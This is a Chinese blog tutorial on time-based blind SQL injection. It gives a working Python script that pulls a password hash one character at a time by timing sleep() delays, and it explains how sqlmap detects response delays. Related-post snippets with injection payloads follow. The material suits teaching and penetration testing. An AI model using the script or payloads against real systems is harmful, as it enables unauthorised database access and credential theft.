Sql注入系列详解(一)---基于时间差的盲注

最新推荐文章于 2024-03-17 12:15:00 发布
最新推荐文章于 2024-03-17 12:15:00 发布
阅读量1.5w 收藏 5
点赞数 1
分类专栏: Web Safe
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jinzhichaoshuiping/article/details/45568883
版权

Sql 基于时间的盲注

 

基于的原理是,当对数据库进行查询操作,如果查询的条件不存在,语句执行的时间便是0.但往往语句执行的速度非常快,线程信息一闪而过,得到的执行时间基本为0.

例如:


于是sleepN)这个语句在这种情况下起到了非常大的作用。

 Select sleepN)可以让此语句运行n秒钟。


但是如果查询语句的条件不存在,执行的时间便是0,利用该函数这样一个特殊的性质,可以利用时间延迟来判断我们查询的是否存在。

这便是SQL基于时间延迟的盲注的工作原理

 

在实际使用中会用到find_in_set这样一个函数。

如果字符串str是在的strlist组成的N子串的字符串列表,返回值的范围为1N



给出一个很对32hash的盲注算法

import urllib
import urllib2
import socket
from time import time
socket.setdefaulttimeout(1000000)
def doinject(payload):
    url = 'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
    values = {'injection':payload,'inject':'Inject'}
    data = urllib.urlencode(values)
    #print data
    req = urllib2.Request(url, data)
    req.add_header('cookie','xx=xxxxxxxxxxxxxxxxxxxxxxxxxxxx')
    start = time()
    response = urllib2.urlopen(req)
    end = time()
    #print response.read()
    index = int(end-start)
    print 'index:'+ str(index)
    print 'char:' + wordlist[index-1]
    return index
wordlist = "0123456789ABCDEF"
res = ""
for i in range(1,34):
    num = doinject('\' or sleep( find_in_set(substring(password, '+str(i)+', 1), \'0,1,2,3,4,5,6,7,8,9,A,B,C,D,E,F\')) -- LanLan')
    res = res+wordlist[num-1]
    print res

源码来自FreeBuff

接下来看看在注入神器sqlmap,是怎样实现基于时间的盲注的!


里面的核心函数是Request.queryPage()

 

在该函数中


如果采用基于时间差的盲注,将多次递归调用queryPage函数,不过使用的参数与第一次不同。

将每次的响应时间存放在kb.responseTimes中。

 

如果不是,就将响应时间在kb.responseTimes扩展。


返回的是最后一次的是否有响应延迟。


deviation = stdev(kb.responseTimes)

求出多次响应时间的标准差,与平均值计算得lowerStdLimit,将最后一次的响应时间threadData.lastQueryDuration。相比较,如果较长,则说明有延迟。

 

有延迟说明服务器对数据正确响应。



CHAO_^
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
SQL注入之基于布尔的详解
09-10
首先说明的注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入一般分为布尔和基于时间的。这篇文章主要讲解的是基于布尔的。下面来一起看看吧。
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 4662
1.概念 1.延时注入:当进行的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
SQL注入之时间延迟型注入
DM766924的博客
09-16 1478
时间延迟型注入 原理:利用if函数,执行判断; 如果正确,直接返回(时间很短,网速有一定影响) 如果不正确,执行时间延迟,常用的函数有sleep和benchmark 以上操作也可以反过来。适用环境:界面无法用布尔真假判断,也无法报错注入的情况下。 时间延迟注入常用SQL函数介绍 if(condition,expr1,expr2)功能:如果condition是true,则if()的返回值是expr1,否则返回值则为expr2,if()的返回值为数字值或字符串,具体情况视其所在语境而定举例:select
【万字长文】SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
Libra1313的博客
03-17 1673
之前一直有粉丝朋友,在挖漏洞过程中使用到SQL注入,希望大白给他讲解一些的SQL注入,今天大白也特地给粉丝朋友安排好了SQL注入攻击方式根据应用程序处理数据库返回内容的不同,可以分为可显注入、报错注入
墨者学院SQL注入(时间
weixin_45819911的博客
07-16 950
墨者学院SQL注入(时间)(手动注入+sqlmap+对于注入语句中的那个 ’ 的测试) 闲谈 这样写标题比较醒目,主要是想帮帮像我一样的强迫症的小伙伴,(其实我发现是在线靶场的解题思路啥的看的人多,如果有小伙伴对于我的推测有不同见解的地方可以留言),因为我最近在刷墨者靶场的SQL注入部分,所以遇到自己觉得有意思的题会发出来,小伙白也可以留言告诉我一些有意思的靶场(这是属于小白的进阶之路)。 0x00 注入点判断: 提示很明显,如图0: 图0 提示很明显是参数?type= 画风正常一点的payload
SQL注入延时注入
qq_45557130的博客
10-07 1481
sql注入延时注入
【墨者学院】SQL注入漏洞测试(时间)
ST0new的博客
06-11 2977
目标 了解SQL时间 掌握SQL注入语法 掌握SQL注入原理 了解SQL注入常用释字符 本题使用的工具 sqlmap,hackbar 环境 物理机:windows10 虚拟机:kali 时间 1 判断是否存在 可以发现判断有多种方式,只要能保证sleep()执行,就可以根据回显的时间判断是否存在时间注入 命令1 :http:/ip/flag.php?type=1 and sl...
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具
11-07
宏景HCM SQL注入漏洞(CNVD-2023-08743) ,hrms加解密工具。需要 Java1.8 环境,执行如下命令启动 HrmsTool 工具, -e 是加密, -d 是解密。 $ java -jar HrmsTool.jar Usage: java -jar HrmsTool.jar -e xxx java ...
详解S-CMS企业建站v3几处SQL注入
09-30
主要介绍了详解S-CMS企业建站v3几处SQL注入,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
SQL注入漏洞测试
09-12
SQL注入漏洞测试入门篇
sqlmap HTTP参数设置(五)
hpx12345678的博客
10-06 904
1)目的:等待响应的时间超过设置的时间sqlmap将会认为目标无法响应从而跳出执行的过程2)使用方法这样设置超时时间为11s。
墨者学院——SQL注入漏洞测试(时间
m0_74093152的博客
04-08 706
type=1 and sleep(10),发现网页有明显延迟,说明sleep函数被执行,该网页存在时间注入。可以发现当第一个字母的ASCII码为102时,即为字符‘f’时,发现有延迟,即该表的第一个字母是‘f’测试发现当database=12时网页出现延迟,发生时间注入,说明数据库的长度为12。通过构造payload去获得数据库长度,x为猜想的数据库长度。当猜想数据长度为6的时候有延迟,说明该数据的长度为6。以此类推可以猜得该长度为6的数据内容为mozhe1。以此类推猜出长度为4的表名。
Sqlmap参数学习笔记
qq_49091880的博客
01-04 4682
自己的学习笔记,希望各位大佬批评指正
sqlmap 使用
devil8123665的博客
04-17 6568
sql sqlmap.py -u "http://192.168.190.159/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie "security=low; PHPSESSID=vdc32duqf2vlc92tepq3fvfp70" --technique B --dbs --batch 通过上文...
SQL 注入漏洞(八)时间注入/延时注入
不秃头的程序Yang
06-12 4475
二、代码分析 三、sqlmap测时间注入
SQL注入之延时注入
热门推荐
秋水的博客
09-01 1万+
延时注入简介 个人理解: 延时注入又称时间,也是的一种。通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据/ 应用场景: 延时注入的应用场景是,在我们输入and 1或者and 0的时候,页面的返回无变化,这个时候可以通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入 相关函数 延时注入会用到布尔的所有...
sql注入基于布尔/时间的详解
Sp4rkW的博客
10-07 9428
本来想自己总结写一篇的,发现有篇写的很好,转载mark一个~ 原文链接:http://www.jb51.net/article/93445.htm 基于布尔的 Web的页面的仅仅会返回True和False。那么布尔就是进行SQL注入之后然后根据页面返回的True或者是False来得到数据库中的相关信息。 由于本次是布尔注入,手无法完整地进行脱裤。所以在本节需要编写大量...
sql注入中-- - 和-- + 和#的区别
06-02
SQL 注入中,"--"、"-- "、"--+"、"#"等符号是常用的释符号,用于在 SQL 语句中释掉后面的内容,以达到绕过身份验证、绕过 SQL 语句限制、获取敏感信息等目的。它们的区别如下: 1. "--":表示释掉后面的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

CHAO_^

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值